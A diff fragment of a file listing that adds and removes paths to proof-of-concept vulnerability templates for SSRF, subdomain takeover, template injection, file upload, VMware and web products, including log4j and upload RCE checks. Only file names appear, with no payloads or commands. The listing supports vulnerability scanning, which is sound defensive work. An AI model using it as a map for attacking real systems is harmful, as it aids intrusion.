./poc/ssrf/wp-plugin-canto-ssrf.yaml ./poc/ssrf/wp-under-construction-ssrf.yaml ./poc/ssrf/wso2-ssrf.yaml @@ -95167,10 +95155,10 @@ ./poc/ssrf/xmlrpc-pingback-ssrf-11688.yaml ./poc/ssrf/xmlrpc-pingback-ssrf-11690.yaml ./poc/ssrf/xmlrpc-pingback-ssrf.yaml -./poc/ssrf/yongyou-ssrf-11745.yaml ./poc/ssrf/yongyou-ssrf.yaml ./poc/ssrf/zimbra-preauth-ssrf-11809.yaml ./poc/ssrf/zimbra-preauth-ssrf-11810.yaml +./poc/ssrf/zimbra-preauth-ssrf.yaml ./poc/ssrf/zzzcms-ssrf.yaml ./poc/subdomain_takeover/account-takeover-via-registration.yaml ./poc/subdomain_takeover/acquia-takeover-34.yaml @@ -95178,19 +95166,22 @@ ./poc/subdomain_takeover/aftership-takeover-202.yaml ./poc/subdomain_takeover/aftership-takeover-203.yaml ./poc/subdomain_takeover/aftership-takeover-204.yaml +./poc/subdomain_takeover/aftership-takeover-205.yaml ./poc/subdomain_takeover/aftership-takeover-206.yaml +./poc/subdomain_takeover/agilecrm-takeover-208.yaml ./poc/subdomain_takeover/agilecrm-takeover-209.yaml ./poc/subdomain_takeover/agilecrm-takeover-210.yaml ./poc/subdomain_takeover/agilecrm-takeover-211.yaml ./poc/subdomain_takeover/aha-takeover-213.yaml ./poc/subdomain_takeover/aha-takeover-214.yaml ./poc/subdomain_takeover/aha-takeover-215.yaml +./poc/subdomain_takeover/aha-takeover-216.yaml ./poc/subdomain_takeover/aha-takeover-217.yaml +./poc/subdomain_takeover/airee-takeover-226.yaml ./poc/subdomain_takeover/airee-takeover-227.yaml -./poc/subdomain_takeover/airee-takeover-228.yaml ./poc/subdomain_takeover/airee-takeover.yaml ./poc/subdomain_takeover/anima-takeover-317.yaml -./poc/subdomain_takeover/anima-takeover-318.yaml +./poc/subdomain_takeover/anima-takeover-319.yaml ./poc/subdomain_takeover/anima-takeover-320.yaml ./poc/subdomain_takeover/anima-takeover.yaml ./poc/subdomain_takeover/announcekit-takeover-322.yaml @@ -95204,25 +95195,26 @@ ./poc/subdomain_takeover/azure-takeover-detection-682.yaml ./poc/subdomain_takeover/azure-takeover-detection-683.yaml ./poc/subdomain_takeover/azure-takeover-detection.yaml -./poc/subdomain_takeover/bigcartel-takeover-727.yaml +./poc/subdomain_takeover/bigcartel-takeover-728.yaml ./poc/subdomain_takeover/bigcartel-takeover-729.yaml ./poc/subdomain_takeover/bigcartel-takeover.yaml +./poc/subdomain_takeover/bitbucket-takeover-738.yaml ./poc/subdomain_takeover/bitbucket-takeover-739.yaml -./poc/subdomain_takeover/bitbucket-takeover-740.yaml ./poc/subdomain_takeover/bitbucket-takeover-741.yaml ./poc/subdomain_takeover/bitbucket-takeover.yaml -./poc/subdomain_takeover/brightcove-takeover-785.yaml +./poc/subdomain_takeover/brightcove-takeover-783.yaml +./poc/subdomain_takeover/brightcove-takeover-784.yaml ./poc/subdomain_takeover/brightcove-takeover.yaml ./poc/subdomain_takeover/campaignmonitor-takeover.yaml +./poc/subdomain_takeover/canny-takeover-854.yaml ./poc/subdomain_takeover/canny-takeover-855.yaml ./poc/subdomain_takeover/canny-takeover-856.yaml -./poc/subdomain_takeover/canny-takeover-857.yaml ./poc/subdomain_takeover/canny-takeover.yaml ./poc/subdomain_takeover/cargo-takeover-866.yaml -./poc/subdomain_takeover/cargo-takeover-868.yaml +./poc/subdomain_takeover/cargo-takeover-867.yaml ./poc/subdomain_takeover/cargo-takeover-869.yaml ./poc/subdomain_takeover/cargo-takeover.yaml -./poc/subdomain_takeover/cargocollective-takeover-862.yaml +./poc/subdomain_takeover/cargocollective-takeover-863.yaml ./poc/subdomain_takeover/cargocollective-takeover-864.yaml ./poc/subdomain_takeover/cargocollective-takeover-865.yaml ./poc/subdomain_takeover/cargocollective-takeover.yaml @@ -95230,6 +95222,7 @@ ./poc/subdomain_takeover/detect-all-takeover.yaml ./poc/subdomain_takeover/detect-all-takeovers.yaml ./poc/subdomain_takeover/elasticbeanstalk-takeover.yaml +./poc/subdomain_takeover/elasticbeantalk-takeover-7188.yaml ./poc/subdomain_takeover/elasticbeantalk-takeover.yaml ./poc/subdomain_takeover/fastly-takeover-7429.yaml ./poc/subdomain_takeover/fastly-takeover.yaml @@ -95237,30 +95230,35 @@ ./poc/subdomain_takeover/feedpress-takeover-7456.yaml ./poc/subdomain_takeover/feedpress-takeover.yaml ./poc/subdomain_takeover/flexbe-takeover-7504.yaml +./poc/subdomain_takeover/flexbe-takeover-7505.yaml ./poc/subdomain_takeover/flexbe-takeover-7506.yaml ./poc/subdomain_takeover/flexbe-takeover.yaml +./poc/subdomain_takeover/flywheel-takeover-7525.yaml ./poc/subdomain_takeover/flywheel-takeover-7526.yaml ./poc/subdomain_takeover/flywheel-takeover.yaml ./poc/subdomain_takeover/flywheel_takeover.yaml -./poc/subdomain_takeover/freshdesk-takeover-7540.yaml +./poc/subdomain_takeover/freshdesk-takeover-7541.yaml ./poc/subdomain_takeover/freshdesk-takeover.yaml ./poc/subdomain_takeover/freshservice-takeover.yaml +./poc/subdomain_takeover/frontify-takeover-7542.yaml ./poc/subdomain_takeover/frontify-takeover-7543.yaml ./poc/subdomain_takeover/frontify-takeover-7544.yaml ./poc/subdomain_takeover/frontify-takeover.yaml ./poc/subdomain_takeover/gemfury-takeover-7576.yaml ./poc/subdomain_takeover/gemfury-takeover-7577.yaml +./poc/subdomain_takeover/gemfury-takeover-7578.yaml ./poc/subdomain_takeover/gemfury-takeover-7579.yaml ./poc/subdomain_takeover/gemfury-takeover.yaml -./poc/subdomain_takeover/getresponse-takeover-7607.yaml ./poc/subdomain_takeover/getresponse-takeover-7608.yaml +./poc/subdomain_takeover/getresponse-takeover-7609.yaml ./poc/subdomain_takeover/getresponse-takeover-7610.yaml ./poc/subdomain_takeover/getresponse-takeover.yaml +./poc/subdomain_takeover/ghost-takeover-7619.yaml ./poc/subdomain_takeover/ghost-takeover-7620.yaml -./poc/subdomain_takeover/ghost-takeover-7621.yaml ./poc/subdomain_takeover/ghost-takeover-7622.yaml ./poc/subdomain_takeover/ghost-takeover.yaml ./poc/subdomain_takeover/gitbook-takeover-7626.yaml +./poc/subdomain_takeover/gitbook-takeover-7627.yaml ./poc/subdomain_takeover/gitbook-takeover.yaml ./poc/subdomain_takeover/github-takeover-7658.yaml ./poc/subdomain_takeover/github-takeover-7659.yaml @@ -95269,52 +95267,52 @@ ./poc/subdomain_takeover/github-takeover-7662.yaml ./poc/subdomain_takeover/github-takeover-7663.yaml ./poc/subdomain_takeover/github-takeover.yaml +./poc/subdomain_takeover/hatenablog-takeover-7907.yaml ./poc/subdomain_takeover/hatenablog-takeover-7908.yaml ./poc/subdomain_takeover/hatenablog-takeover-7909.yaml ./poc/subdomain_takeover/hatenablog-takeover-7910.yaml ./poc/subdomain_takeover/hatenablog-takeover.yaml -./poc/subdomain_takeover/helpjuice-takeover-7925.yaml +./poc/subdomain_takeover/helpjuice-takeover-7926.yaml ./poc/subdomain_takeover/helpjuice-takeover-7927.yaml ./poc/subdomain_takeover/helpjuice-takeover-7928.yaml ./poc/subdomain_takeover/helpjuice-takeover.yaml ./poc/subdomain_takeover/helprace-takeover-7929.yaml +./poc/subdomain_takeover/helprace-takeover-7930.yaml ./poc/subdomain_takeover/helprace-takeover-7931.yaml -./poc/subdomain_takeover/helprace-takeover-7932.yaml ./poc/subdomain_takeover/helprace-takeover.yaml ./poc/subdomain_takeover/helpscout-takeover-7933.yaml ./poc/subdomain_takeover/helpscout-takeover-7934.yaml ./poc/subdomain_takeover/helpscout-takeover-7935.yaml +./poc/subdomain_takeover/helpscout-takeover-7936.yaml ./poc/subdomain_takeover/helpscout-takeover.yaml ./poc/subdomain_takeover/heroku-takeover-7941.yaml ./poc/subdomain_takeover/heroku-takeover-7942.yaml ./poc/subdomain_takeover/heroku-takeover-7943.yaml -./poc/subdomain_takeover/heroku-takeover-7944.yaml ./poc/subdomain_takeover/heroku-takeover.yaml ./poc/subdomain_takeover/hubspot-takeover-8077.yaml ./poc/subdomain_takeover/hubspot-takeover-8078.yaml ./poc/subdomain_takeover/hubspot-takeover-8079.yaml ./poc/subdomain_takeover/hubspot-takeover.yaml -./poc/subdomain_takeover/intercom-takeover-8167.yaml +./poc/subdomain_takeover/intercom-takeover-8166.yaml ./poc/subdomain_takeover/intercom-takeover-8168.yaml ./poc/subdomain_takeover/intercom-takeover-8169.yaml ./poc/subdomain_takeover/intercom-takeover.yaml ./poc/subdomain_takeover/jazzhr-takeover-8233.yaml ./poc/subdomain_takeover/jazzhr-takeover-8234.yaml +./poc/subdomain_takeover/jazzhr-takeover-8235.yaml ./poc/subdomain_takeover/jazzhr-takeover.yaml +./poc/subdomain_takeover/jetbrains-takeover-8292.yaml ./poc/subdomain_takeover/jetbrains-takeover-8293.yaml ./poc/subdomain_takeover/jetbrains-takeover-8294.yaml ./poc/subdomain_takeover/jetbrains-takeover.yaml ./poc/subdomain_takeover/kinsta-takeover-8492.yaml ./poc/subdomain_takeover/kinsta-takeover-8493.yaml ./poc/subdomain_takeover/kinsta-takeover-8494.yaml -./poc/subdomain_takeover/kinsta-takeover-8495.yaml ./poc/subdomain_takeover/kinsta-takeover.yaml -./poc/subdomain_takeover/landingi-takeover-8567.yaml +./poc/subdomain_takeover/landingi-takeover-8566.yaml ./poc/subdomain_takeover/landingi-takeover.yaml -./poc/subdomain_takeover/launchrock-takeover-8602.yaml ./poc/subdomain_takeover/launchrock-takeover-8603.yaml ./poc/subdomain_takeover/launchrock-takeover-8604.yaml -./poc/subdomain_takeover/launchrock-takeover-8605.yaml ./poc/subdomain_takeover/launchrock-takeover.yaml ./poc/subdomain_takeover/leadpages-takeover.yaml ./poc/subdomain_takeover/locomotivetakeover.yaml @@ -95328,64 +95326,63 @@ ./poc/subdomain_takeover/netlify-takeover-9042.yaml ./poc/subdomain_takeover/netlify-takeover-9043.yaml ./poc/subdomain_takeover/netlify-takeover.yaml -./poc/subdomain_takeover/ngrok-takeover-9126.yaml ./poc/subdomain_takeover/ngrok-takeover-9127.yaml +./poc/subdomain_takeover/ngrok-takeover-9128.yaml ./poc/subdomain_takeover/ngrok-takeover-9129.yaml ./poc/subdomain_takeover/ngrok-takeover.yaml ./poc/subdomain_takeover/pagewiz-takeover.yaml ./poc/subdomain_takeover/pantheon-takeover-9458.yaml -./poc/subdomain_takeover/pantheon-takeover-9459.yaml ./poc/subdomain_takeover/pantheon-takeover-9460.yaml ./poc/subdomain_takeover/pantheon-takeover-9461.yaml ./poc/subdomain_takeover/pantheon-takeover.yaml -./poc/subdomain_takeover/pingdom-takeover-9584.yaml ./poc/subdomain_takeover/pingdom-takeover-9585.yaml +./poc/subdomain_takeover/pingdom-takeover-9586.yaml ./poc/subdomain_takeover/pingdom-takeover-9587.yaml ./poc/subdomain_takeover/pingdom-takeover.yaml ./poc/subdomain_takeover/proposify-takeover-9693.yaml ./poc/subdomain_takeover/proposify-takeover-9694.yaml -./poc/subdomain_takeover/proposify-takeover-9695.yaml +./poc/subdomain_takeover/proposify-takeover-9696.yaml ./poc/subdomain_takeover/proposify-takeover.yaml ./poc/subdomain_takeover/readme-takeover-9841.yaml +./poc/subdomain_takeover/readme-takeover-9842.yaml ./poc/subdomain_takeover/readme-takeover-9843.yaml ./poc/subdomain_takeover/readme-takeover.yaml -./poc/subdomain_takeover/readthedocs-takeover-9844.yaml ./poc/subdomain_takeover/readthedocs-takeover-9845.yaml +./poc/subdomain_takeover/readthedocs-takeover-9846.yaml ./poc/subdomain_takeover/readthedocs-takeover-9847.yaml ./poc/subdomain_takeover/readthedocs-takeover.yaml ./poc/subdomain_takeover/s3-subtakeover-9967.yaml -./poc/subdomain_takeover/s3-subtakeover-9968.yaml +./poc/subdomain_takeover/s3-subtakeover-9969.yaml ./poc/subdomain_takeover/s3-subtakeover.yaml -./poc/subdomain_takeover/shopify-takeover-10201.yaml ./poc/subdomain_takeover/shopify-takeover-10202.yaml ./poc/subdomain_takeover/shopify-takeover-10203.yaml ./poc/subdomain_takeover/shopify-takeover-10204.yaml ./poc/subdomain_takeover/shopify-takeover.yaml ./poc/subdomain_takeover/short-io-takeover.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10271.yaml -./poc/subdomain_takeover/simplebooklet-takeover-10272.yaml ./poc/subdomain_takeover/simplebooklet-takeover-10273.yaml +./poc/subdomain_takeover/simplebooklet-takeover-10274.yaml ./poc/subdomain_takeover/simplebooklet-takeover.yaml +./poc/subdomain_takeover/smartjob-takeover-10322.yaml ./poc/subdomain_takeover/smartjob-takeover-10323.yaml -./poc/subdomain_takeover/smartjob-takeover-10324.yaml ./poc/subdomain_takeover/smartjob-takeover-10325.yaml ./poc/subdomain_takeover/smartjob-takeover.yaml -./poc/subdomain_takeover/smartling-takeover-10326.yaml +./poc/subdomain_takeover/smartling-takeover-10327.yaml ./poc/subdomain_takeover/smartling-takeover.yaml ./poc/subdomain_takeover/smugmug-takeover-10337.yaml -./poc/subdomain_takeover/smugmug-takeover-10338.yaml +./poc/subdomain_takeover/smugmug-takeover-10339.yaml ./poc/subdomain_takeover/smugmug-takeover-10340.yaml ./poc/subdomain_takeover/smugmug-takeover.yaml ./poc/subdomain_takeover/sprintful-takeover-10495.yaml ./poc/subdomain_takeover/sprintful-takeover.yaml ./poc/subdomain_takeover/strikingly-takeover-10549.yaml ./poc/subdomain_takeover/strikingly-takeover-10550.yaml +./poc/subdomain_takeover/strikingly-takeover-10551.yaml ./poc/subdomain_takeover/strikingly-takeover.yaml ./poc/subdomain_takeover/subdomain-takeOver.yaml ./poc/subdomain_takeover/subdomain-takeover-dns-wildcards.yaml ./poc/subdomain_takeover/subdomain-takeover-dns.yaml ./poc/subdomain_takeover/subdomain-takeover.yaml -./poc/subdomain_takeover/surge-takeover-10578.yaml ./poc/subdomain_takeover/surge-takeover-10579.yaml ./poc/subdomain_takeover/surge-takeover.yaml ./poc/subdomain_takeover/surveygizmo-takeover-10581.yaml @@ -95395,53 +95392,53 @@ ./poc/subdomain_takeover/surveysparrow-takeover.yaml ./poc/subdomain_takeover/takeover-checker.yaml ./poc/subdomain_takeover/tave-takeover-10659.yaml +./poc/subdomain_takeover/tave-takeover-10660.yaml ./poc/subdomain_takeover/tave-takeover-10661.yaml -./poc/subdomain_takeover/tave-takeover-10662.yaml ./poc/subdomain_takeover/tave-takeover.yaml +./poc/subdomain_takeover/teamwork-takeover-10668.yaml ./poc/subdomain_takeover/teamwork-takeover-10669.yaml -./poc/subdomain_takeover/teamwork-takeover-10670.yaml ./poc/subdomain_takeover/teamwork-takeover-10671.yaml ./poc/subdomain_takeover/teamwork-takeover.yaml -./poc/subdomain_takeover/tictail-takeover-10767.yaml +./poc/subdomain_takeover/tictail-takeover-10766.yaml ./poc/subdomain_takeover/tictail-takeover-10768.yaml ./poc/subdomain_takeover/tictail-takeover.yaml -./poc/subdomain_takeover/tilda-takeover-10781.yaml ./poc/subdomain_takeover/tilda-takeover-10782.yaml +./poc/subdomain_takeover/tilda-takeover-10783.yaml ./poc/subdomain_takeover/tilda-takeover-10784.yaml ./poc/subdomain_takeover/tilda-takeover.yaml +./poc/subdomain_takeover/tumblr-takeover-10845.yaml ./poc/subdomain_takeover/tumblr-takeover-10846.yaml -./poc/subdomain_takeover/tumblr-takeover-10847.yaml ./poc/subdomain_takeover/tumblr-takeover.yaml ./poc/subdomain_takeover/uberflip-takeover-10864.yaml ./poc/subdomain_takeover/uberflip-takeover-10865.yaml ./poc/subdomain_takeover/uberflip-takeover-10866.yaml ./poc/subdomain_takeover/uberflip-takeover.yaml -./poc/subdomain_takeover/unbounce-takeover-10971.yaml +./poc/subdomain_takeover/unbounce-takeover-10970.yaml ./poc/subdomain_takeover/unbounce-takeover.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10986.yaml +./poc/subdomain_takeover/uptimerobot-takeover-10987.yaml ./poc/subdomain_takeover/uptimerobot-takeover-10988.yaml -./poc/subdomain_takeover/uptimerobot-takeover-10989.yaml ./poc/subdomain_takeover/uptimerobot-takeover.yaml ./poc/subdomain_takeover/urge-takeover.yaml ./poc/subdomain_takeover/uservoice-takeover.yaml -./poc/subdomain_takeover/vend-takeover-10996.yaml ./poc/subdomain_takeover/vend-takeover-10997.yaml +./poc/subdomain_takeover/vend-takeover-10998.yaml ./poc/subdomain_takeover/vend-takeover-10999.yaml ./poc/subdomain_takeover/vend-takeover.yaml -./poc/subdomain_takeover/vercel-takeover-11001.yaml +./poc/subdomain_takeover/vercel-takeover-11000.yaml ./poc/subdomain_takeover/vercel-takeover.yaml -./poc/subdomain_takeover/webflow-takeover-11131.yaml ./poc/subdomain_takeover/webflow-takeover-11132.yaml +./poc/subdomain_takeover/webflow-takeover-11133.yaml ./poc/subdomain_takeover/webflow-takeover-11134.yaml ./poc/subdomain_takeover/webflow-takeover.yaml ./poc/subdomain_takeover/wishpond-takeover-11215.yaml -./poc/subdomain_takeover/wishpond-takeover-11217.yaml +./poc/subdomain_takeover/wishpond-takeover-11216.yaml ./poc/subdomain_takeover/wishpond-takeover-11218.yaml ./poc/subdomain_takeover/wishpond-takeover.yaml ./poc/subdomain_takeover/wix-takeover-11219.yaml ./poc/subdomain_takeover/wordpress-takeover-11310.yaml ./poc/subdomain_takeover/wordpress-takeover-11311.yaml -./poc/subdomain_takeover/wordpress-takeover-11313.yaml +./poc/subdomain_takeover/wordpress-takeover-11312.yaml ./poc/subdomain_takeover/wordpress-takeover-11314.yaml ./poc/subdomain_takeover/wordpress-takeover.yaml ./poc/subdomain_takeover/worksite-takeover-workflow-11389.yaml @@ -95449,11 +95446,11 @@ ./poc/subdomain_takeover/worksites-takeover.yaml ./poc/subdomain_takeover/wpsite-background-takeover-27e55b32604a97373f48c9d933458e81.yaml ./poc/subdomain_takeover/wpsite-background-takeover.yaml -./poc/subdomain_takeover/wufoo-takeover-11649.yaml +./poc/subdomain_takeover/wufoo-takeover-11648.yaml ./poc/subdomain_takeover/wufoo-takeover-11650.yaml ./poc/subdomain_takeover/wufoo-takeover-11651.yaml ./poc/subdomain_takeover/wufoo-takeover.yaml -./poc/subdomain_takeover/zendesk-takeover-11780.yaml +./poc/subdomain_takeover/zendesk-takeover-11781.yaml ./poc/subdomain_takeover/zendesk-takeover-11782.yaml ./poc/subdomain_takeover/zendesk-takeover-11783.yaml ./poc/subdomain_takeover/zendesk-takeover.yaml @@ -95461,15 +95458,17 @@ ./poc/template_injection/hidden-ssti.yaml ./poc/template_injection/jeecg-boot-ssti.yaml ./poc/template_injection/node-nunjucks-ssti.yaml +./poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml ./poc/template_injection/pdf-signer-ssti-to-rce-9471.yaml -./poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml ./poc/template_injection/pdf-signer-ssti-to-rce.yaml +./poc/template_injection/pikpikcussti.yaml ./poc/template_injection/reflection-ssti.yaml ./poc/template_injection/ssti-10528.yaml ./poc/template_injection/ssti-fuzz.yaml ./poc/template_injection/ssti-jinja2.yaml ./poc/template_injection/ssti-vuln-params.yaml ./poc/template_injection/ssti.yaml +./poc/template_injection/twig-php-ssti-10856.yaml ./poc/template_injection/twig-php-ssti-10857.yaml ./poc/template_injection/twig-php-ssti-10858.yaml ./poc/template_injection/twig-php-ssti-10859.yaml @@ -95613,7 +95612,6 @@ ./poc/upload/exposed-jquery-file-upload-7313.yaml ./poc/upload/exposed-jquery-file-upload-7314.yaml ./poc/upload/exposed-jquery-file-upload-7315.yaml -./poc/upload/exposed-jquery-file-upload.yaml ./poc/upload/fanruan-finereport-v9-design-save-svg-fileupload.yaml ./poc/upload/fanruan-oa-v9-designsavevg-upload-file.yaml ./poc/upload/fanwei-e-office-v10-fileupload.yaml @@ -95765,8 +95763,8 @@ ./poc/upload/nsfocus-nf-bugsInfo-fileupload.yaml ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml -./poc/upload/oa-v9-uploads-file-9189.yaml -./poc/upload/oa-v9-uploads-file-9190.yaml +./poc/upload/oa-v9-uploads-file-9191.yaml +./poc/upload/oa-v9-uploads-file.yaml ./poc/upload/pc4uploader.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml @@ -95842,6 +95840,7 @@ ./poc/upload/shiziyuCMS-ck-AnyFileUpload.yaml ./poc/upload/showdoc-file-upload-rce-10225.yaml ./poc/upload/showdoc-file-upload-rce-10226.yaml +./poc/upload/showdoc-file-upload-rce-10227.yaml ./poc/upload/showdoc-file-upload-rce-10228.yaml ./poc/upload/showdoc-file-upload-rce.yaml ./poc/upload/showdoc-uploadfile.yaml @@ -95892,8 +95891,9 @@ ./poc/upload/ueditor_1433_net-upload-catchimage.yaml ./poc/upload/unauthenticated-popup-upload-10919.yaml ./poc/upload/unauthenticated-popup-upload-10920.yaml -./poc/upload/unauthenticated-popup-upload-10922.yaml +./poc/upload/unauthenticated-popup-upload-10921.yaml ./poc/upload/unauthenticated-popup-upload-10923.yaml +./poc/upload/unauthenticated-popup-upload.yaml ./poc/upload/upload-file-type-settings-plugin-34a83d20c52593027e0331b726395a3e.yaml ./poc/upload/upload-file-type-settings-plugin.yaml ./poc/upload/upload-media-by-url-76789b55ff551b3b92d96d845bdeb7a3.yaml @@ -96091,9 +96091,10 @@ ./poc/vmware/vmware-hcx-login.yaml ./poc/vmware/vmware-horizon-11038.yaml ./poc/vmware/vmware-horizon-11039.yaml -./poc/vmware/vmware-horizon-11041.yaml +./poc/vmware/vmware-horizon-11040.yaml ./poc/vmware/vmware-horizon-daas.yaml ./poc/vmware/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/vmware/vmware-horizon-log4j-jndi-rce.yaml ./poc/vmware/vmware-horizon-log4j-rce.yaml ./poc/vmware/vmware-horizon-panel-11035.yaml ./poc/vmware/vmware-horizon-panel-11037.yaml @@ -96107,13 +96108,13 @@ ./poc/vmware/vmware-vcenter-cve-2021-21985-rce.yml ./poc/vmware/vmware-vcenter-lfi-1.yaml ./poc/vmware/vmware-vcenter-lfi-11046.yaml -./poc/vmware/vmware-vcenter-lfi-11047.yaml ./poc/vmware/vmware-vcenter-lfi-11048.yaml ./poc/vmware/vmware-vcenter-lfi-2.yaml ./poc/vmware/vmware-vcenter-lfi-3.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11042.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11043.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11045.yaml +./poc/vmware/vmware-vcenter-lfi.yaml ./poc/vmware/vmware-vcenter-log4j-jndi-rce-11050.yaml ./poc/vmware/vmware-vcenter-ssrf-11051.yaml ./poc/vmware/vmware-vcenter-ssrf-11052.yaml @@ -96127,12 +96128,13 @@ ./poc/vmware/vmware-virtualcenter.yaml ./poc/vmware/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/vmware/vmware-vrealize-detect-11056.yaml -./poc/vmware/vmware-vrealize-detect-11057.yaml ./poc/vmware/vmware-vrealize-detect-11058.yaml +./poc/vmware/vmware-vrealize-detect.yaml ./poc/vmware/vmware-vrealize-operations-manager.yaml ./poc/vmware/vmware-vrealize.yaml ./poc/vmware/vmware-vsphere.yaml -./poc/vmware/vmware-workflow-11059.yaml +./poc/vmware/vmware-workflow-11060.yaml +./poc/vmware/vmware-workflow.yaml ./poc/vmware/vmware-workspace-one-log4j-rce.yaml ./poc/vmware/vmwareview.yaml ./poc/web/360-webscan.yaml @@ -96190,7 +96192,6 @@ ./poc/web/allwebmenus-wordpress-menu-plugin.yaml ./poc/web/alphaweb-default-login-276.yaml ./poc/web/alphaweb-default-login-277.yaml -./poc/web/alphaweb-default-login.yaml ./poc/web/am-websystem.yaml ./poc/web/amazon-web-services-phish.yaml ./poc/web/apache-oozie-web-console.yaml @@ -96198,10 +96199,9 @@ ./poc/web/appsmith-web-login.yaml ./poc/web/arangodb-web-Interface.yaml ./poc/web/archibus-webcentral-panel.yaml -./poc/web/artica-web-proxy-detect-543.yaml ./poc/web/artica-web-proxy-detect-544.yaml -./poc/web/artica-web-proxy-detect-545.yaml ./poc/web/artica-web-proxy-detect-546.yaml +./poc/web/artica-web-proxy-detect.yaml ./poc/web/artica-web-proxy-workflow.yaml ./poc/web/automatedlogiccorporation-webctrl.yaml ./poc/web/avtech-video-web-server.yaml @@ -96210,22 +96210,22 @@ ./poc/web/aweber-web-form-widget.yaml ./poc/web/axel-webserver.yaml ./poc/web/axigen-webadmin-659.yaml -./poc/web/axigen-webadmin-660.yaml ./poc/web/axigen-webadmin-661.yaml ./poc/web/axigen-webmail-663.yaml ./poc/web/axigen-webmail-664.yaml -./poc/web/axigen-webmail.yaml ./poc/web/axis2-web.yaml ./poc/web/axway-securetransport-webclient.yaml -./poc/web/azkaban-web-client-676.yaml ./poc/web/azkaban-web-client-677.yaml ./poc/web/azkaban-web-client-678.yaml ./poc/web/azkaban-web-client-679.yaml +./poc/web/azkaban-web-client-680.yaml ./poc/web/azkaban-web-client-default-creds.yaml ./poc/web/azure-website-enum.yaml ./poc/web/bizcalendar-web-bbb880210d42a6df93041f7b5a68a42e.yaml ./poc/web/bizcalendar-web.yaml +./poc/web/boa-web-fileread-11846.yaml ./poc/web/boa-web-fileread.yaml +./poc/web/boa-web-server.yaml ./poc/web/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml ./poc/web/catch-web-tools-7e509c5743e470c1816b86d61338d841.yaml ./poc/web/catch-web-tools-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml @@ -96246,11 +96246,11 @@ ./poc/web/cleanweb-panel.yaml ./poc/web/cloud-enum-azure-website.yaml ./poc/web/cobbler-webgui-1122.yaml -./poc/web/cobbler-webgui-1124.yaml +./poc/web/cobbler-webgui-1123.yaml ./poc/web/cobbler-webgui.yaml +./poc/web/codemeter-webadmin-panel-1135.yaml ./poc/web/codemeter-webadmin-panel-1136.yaml ./poc/web/codemeter-webadmin-panel-1137.yaml -./poc/web/codemeter-webadmin-panel-1138.yaml ./poc/web/codemeter-webadmin-panel.yaml ./poc/web/codemeter-webadmin.yaml ./poc/web/codesys-webvisu.yaml @@ -96327,8 +96327,8 @@ ./poc/web/ewebs-arbitrary-file-reading-7273.yaml ./poc/web/ewebs-lfi.yaml ./poc/web/ewebs.yaml +./poc/web/exposed-webalizer-7358.yaml ./poc/web/exposed-webalizer-7359.yaml -./poc/web/exposed-webalizer-7360.yaml ./poc/web/exposed-webalizer.yaml ./poc/web/facebook-by-weblizar-5f0cf300a16245f7f5c3b4c848d038d5.yaml ./poc/web/facebook-by-weblizar.yaml @@ -96396,6 +96396,7 @@ ./poc/web/h3c-web应用防火墙.yaml ./poc/web/h3c-web网管.yaml ./poc/web/hanweb-system.yaml +./poc/web/hashicorp-consul-webgui-7896.yaml ./poc/web/hashicorp-consul-webgui-7897.yaml ./poc/web/hashicorp-consul-webgui-7898.yaml ./poc/web/hashicorp-consul-webgui.yaml @@ -96406,7 +96407,6 @@ ./poc/web/homeworks-illumination-web-keypad.yaml ./poc/web/honeywell-web-controller-7994.yaml ./poc/web/honeywell-web-controller-7995.yaml -./poc/web/honeywell-web-controller-7996.yaml ./poc/web/honeywell-web-controller.yaml ./poc/web/honeywell-xl-web-controller.yaml ./poc/web/horde-webmail-login.yaml @@ -96449,10 +96449,9 @@ ./poc/web/icewarp-webclient-rce-8130.yaml ./poc/web/icewarp-webclient-rce-8131.yaml ./poc/web/icewarp-webclient-rce-8132.yaml -./poc/web/icewarp-webclient-rce-8133.yaml +./poc/web/icinga-web-login-8134.yaml ./poc/web/icinga-web-login-8135.yaml ./poc/web/icinga-web-login-8136.yaml -./poc/web/icinga-web-login-8137.yaml ./poc/web/icinga-web-login.yaml ./poc/web/ideawebserver.yaml ./poc/web/igenus-webmail.yaml @@ -96469,7 +96468,7 @@ ./poc/web/indigitall-web-push-notifications.yaml ./poc/web/ip-guard-webserver-rce.yaml ./poc/web/iplanet-web-server-8189.yaml -./poc/web/iplanet-web-server-8190.yaml +./poc/web/iplanet-web-server-8191.yaml ./poc/web/iplanet-web-server.yaml ./poc/web/iwebshop.yaml ./poc/web/iwebsns.yaml @@ -96484,7 +96483,7 @@ ./poc/web/keenetic-web-login-8439.yaml ./poc/web/keenetic-web-login-8440.yaml ./poc/web/keenetic-web-login-8441.yaml -./poc/web/keenetic-web-login-8443.yaml +./poc/web/keenetic-web-login-8442.yaml ./poc/web/keenetic-web-login.yaml ./poc/web/keil-embedded-web-server.yaml ./poc/web/kerio-webstar.yaml @@ -96567,8 +96566,8 @@ ./poc/web/openwebui-panel.yaml ./poc/web/opt-webfieldassis.yaml ./poc/web/oracle-iplanet-web-server-9391.yaml +./poc/web/oracle-iplanet-web-server-9392.yaml ./poc/web/oracle-iplanet-web-server-9393.yaml -./poc/web/oracle-iplanet-web-server.yaml ./poc/web/oracle-webdb.yaml ./poc/web/oracle-weblogic.yaml ./poc/web/original-texts-yandex-webmaster-2e0593c9307af66de377149e0e6a4d6c.yaml @@ -96616,11 +96615,11 @@ ./poc/web/ruijie_EWEB_route_auth_rce.yaml ./poc/web/saia-web-server-info-9978.yaml ./poc/web/saia-web-server-info-9979.yaml +./poc/web/saia-web-server-info.yaml ./poc/web/samphpweb.yaml ./poc/web/sap-netweaver-webgui-10056.yaml ./poc/web/sap-netweaver-webgui-10057.yaml ./poc/web/sap-netweaver-webgui-10059.yaml -./poc/web/sap-netweaver-webgui.yaml ./poc/web/sap-nw-abap-webgui.yaml ./poc/web/sap-web-application-server.yaml ./poc/web/sap-web-dispatcher-10074.yaml @@ -96629,6 +96628,7 @@ 